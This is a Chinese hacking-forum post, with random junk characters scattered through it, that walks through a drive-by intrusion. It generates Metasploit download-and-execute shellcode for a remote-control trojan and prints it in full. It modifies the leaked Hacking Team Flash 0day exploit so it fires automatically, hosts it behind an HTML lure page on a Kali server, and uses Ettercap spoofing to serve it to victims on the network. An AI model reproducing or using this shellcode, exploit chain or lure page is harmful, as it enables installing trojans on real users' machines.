* w' V: r e2 V# d( O: {6 m; K 三、flash 0day之手工代码修改制作下载者实例入侵演示
利用到的工具: ( K6 _$ J3 ]2 C! h. Q3 D
3 z" o$ A" e, s" l# P2 a" [' \, n9 J0 p) `5 W0 V; p1 ` Msf
Ettercap
* ?# s! l) B& ?! ?. Y Adobe Flash CS6 # K' H( Y t# j/ c
4 J; @% K: ~4 b2 ], `% B, k" G) R4 ~" S* h Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 $ {; V- W) m2 }9 l+ `: T4 V7 t7 K
9 H& a. U" O) h* ?& Q. G; C( v2 @1 ?) u, W 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
0 E8 n- l- h* f) [- o0 ?! t# j4 e1 X 如图: : y- O( r8 m7 d& m5 [9 ^
( ^" L8 a) z5 S4 T; m; E# y( ~, N* _) v4 @- Q/ H, d, u
' |$ i- J( P& f4 C8 m, E* O+ l
" X6 ^; s& i6 z 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
/ v, G) y/ S8 u* e: t5 h
% l% l5 V8 ^ M3 ^3 A! v 3 l5 k) E+ ?0 [' p# F% J; `
- Z+ N2 M v+ g- }$ }, R |& ?' Z# W& m5 { 然后执行generate -t dword生成shellcode,如下: 8 s! u5 J; g( Q- k0 m
9 G/ c; V, r* I% }8 j5 g % i7 T$ j) O: u' Y2 Z$ Y
' Z3 Q4 G! r( h; \& W; `3 v9 W( @复制代码到文本下便于我们一会编辑flash exp,如下:
" T; X/ n! y1 ?. Y5 O5 [" H3 H# M6 [; { 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, : y4 N& d. X: [: c9 g0 Z; u
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, : m) e7 p. {0 h. M5 k5 i; m) c
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 9 \) i2 H, V: X9 a, Y& E
# i8 ^7 ^% S- I4 `! w* y, B0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
8 _: A; \+ q6 C2 xF, x% {( W' z' F, F, C+ n& E 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
9 B, ~: W" ]( }6 s$ m5 x 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 1 H: q8 \( }' O; q! O
; |6 D& V! Q. M+ Y! Y$ l2 L# D' B! V2 |& V1 j: Y: N4 ~/ q 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ( u. r6 l& F* g9 r8 {0 R
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, & E, ~& Y# I# O% k5 }& r4 c* ]- L
" O- ]# I/ D) L) p' y5 y0 A! U: q( Q$ `* y' o- T5 h 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
" i6 I4 B" `' r& l3 ]: o/ A6 ~' ^% x; T 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ! R' o, ^1 i* |- d, a9 \
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, $ C) }5 c2 h1 c! J
: Q( j: `! E2 ~. w1 Z7 v' M* F7 t( q1 F$ g" [% n 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
8 i1 L% x- u' k% F5 [* X' u( c0 W4 b- C# C7 V
" j+ T# U6 W, F. |$ g X 3 J; f$ ?. o) }3 J' X. d& R
7 t8 h+ v: _4 N4 e9 r* `下面我们来修改flash 0day exp,需要修改三个文件,分别为: * n3 P- v8 U* L/ h. @. s
$ n4 ~9 Y: D* ?" |* V; D& w/ F2 W/ _
, f$ y$ B& R( @/ V/ b' X- }5 Y先修改ShellWin32.as,部分源代码如图: , c8 l, S" X9 F$ f8 g m* l
, H+ j) c3 a0 L# D
5 D8 J* B' ~! n8 e; L 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
) n) d$ P5 y/ l. V) T2 q" @ }& t* n/ {- e4 j* K3 ?% {1 }/ H
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
- i2 c% W2 a0 S- p2 H1 c 2 ^- h9 ?! E2 t# `3 H( p- F
7 W! q3 ^6 t* p* g换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
5 g" k0 q6 Z" g2 a* L, @: g, |, `; T% G5 M" p5 o+ _
8 v/ c2 m" `0 \8 \$ x) r1 w% D, E9 X9 R6 @" j# d }8 d ( P5 v# X. \) w) h- R" M1 o
2 ^# ?1 a) T4 Y" V8 H- s$ {0 c0 I% ~: ~6 X * Z2 ^/ q4 H5 h8 n! f0 }. Z; k
/ n& \) h% J8 j4 n7 M' t1 ]然后点保存,下面我们来编译一下,打开 . V- g& i( m+ s" Z. V f+ f
* l' f0 p1 r' p! \. B; C exp1.fla然后点文件-发布,看看编译没错误 d$ Y' b6 Z7 z! M3 Z
% V& D; s/ ]2 I
& q3 h* F4 L% B
* C1 q" G( j' i+ y. O: g: `' c 6 S4 L4 \: ^* m m- v1 _
& O1 n y' T8 x! V" ~, }" { K9 y. H4 \: x; o8 }6 D8 E 5 c3 S1 Z" i. @& ]
2 G5 Y" g. ~# E4 F, c- p2 T然后我们把生成的
/ J; Z" z& ]1 f% F' _ exp1.swf丢到kailinux 的/var/www/html下: ( O! O1 L2 L0 A& g- S& E
/ p0 o' N& E" b- [( W; i! I 然后把这段代码好好编辑一下
# [, J- X7 R$ K; G+ n
2 |6 B8 J& F& w' z0 G2 \1 N: R$ C* o; b- z! h
! A( f; g4 e" \2 e! X" \3 x
# X% i& I" g1 _3 p, l2 @
2 x% X: m q* P7 f 2 D8 \# O2 b1 }; w3 R
! y8 P0 g/ |5 G" W8 C
8 ~6 J2 [; F& h }, H' } <!DOCTYPE html> 3 ~9 \! P! ]% ?
. D% F$ b+ w* `: P% k. \$ M" O! b2 w d <html>
M! ~( b$ Y6 F& ?- {' U8 k. H" z3 t: K5 }( a) R! H6 ?: C <head> $ o" S7 n7 h1 G# T
<meta http-equiv="Content-Type" content="text/html;
' N @, U- k" ^" g: [: ]% f/ s' h* X) k/ p6 D charset=utf-8"/>
, N. ?' } d8 Y4 H2 Z( E3 f& u) n. ^2 {. B/ Q% v0 P6 ? </head>
% m4 i+ X4 [$ `; ] O <body> ! I5 u* N: m3 Z c$ j
<h2> Please wait, the requested page is loading...</h2>
0 u- J1 x' \* d3 {& I% }: o, ?5 B+ s$ n <br> 3 c6 l9 p; }0 z* {0 x& g( w- I
- m: {3 Z) |+ s3 Y( |' |# G3 A& m4 C5 X <OBJECT - \" _% {2 Y6 i
. h; E! ?4 _0 v, R) }! M. U: _" N" P. W& ^3 ~, H classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie
* L. j* E% ~7 m& A8 Q; ]5 }4 R" ]/ lVALUE="http://192.168.0.109/exp1.swf"></OBJECT>
</body> + G9 s3 B0 W1 t# y. E9 m
<script>
setTimeout(function () {
# i4 h* W% ?- x" V( U8 @% Y& B6 O) P
window.location.reload();
1 q! D* }: i+ u3 L; v}, 10000);
7 `$ y" z; r5 O1 @1 S1 r3 p8 s
; P' H3 \- i$ N0 z8 N2 U/ D5 {</script> ! R$ r) U- G' O, {' Q% b* ]
& j! }# p, _) S, B3 H </html>
$ l8 t1 t( _) T; y |+ \. F- x 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
% W# N8 q2 L0 ]) X9 B% l) k
i8 F" b8 y( W7 P
: \' K# o8 ^ R# G' T" K- t" s! z% d0 Z0 @3 n
+ `8 r3 b& J* \1 D* R& K2 H* H N- M: p# H 7 f8 [6 a' P* ?0 x9 K
# A" s8 {6 k5 s3 J, o
: \' \5 A5 ]2 |" A. } 下面我们用ettercap欺骗如图: ( t3 \6 {/ x5 X, `: q: [
* y: V M- `; F& S ( Q8 i" D+ v' K. i$ O8 |- q
. t+ D( {. ^# W# \5 [# T4 v! c! X0 W0 i2 | w
4 _: Y$ W8 \* H- u @0 Q! ]. G" t* n" E' X0 \5 y 下面我们随便访问个网站看看:
% {6 n/ g) R* v9 j* e" _4 b" Q- C( y 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 8 N& n0 @% r3 j* ^7 F6 N* T( G
3 S& H. H( W4 W4 l B9 `5 g; D$ }# t* N
2 ^4 H( R; [# H2 I$ L7 s' { m6 E& z( t4 ] 我们看另一台, & f0 e0 J" V8 d
9 K, U5 j9 L# U1 E" n: ]4 v/ |C7 d( x$ {+ A9 w! b 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |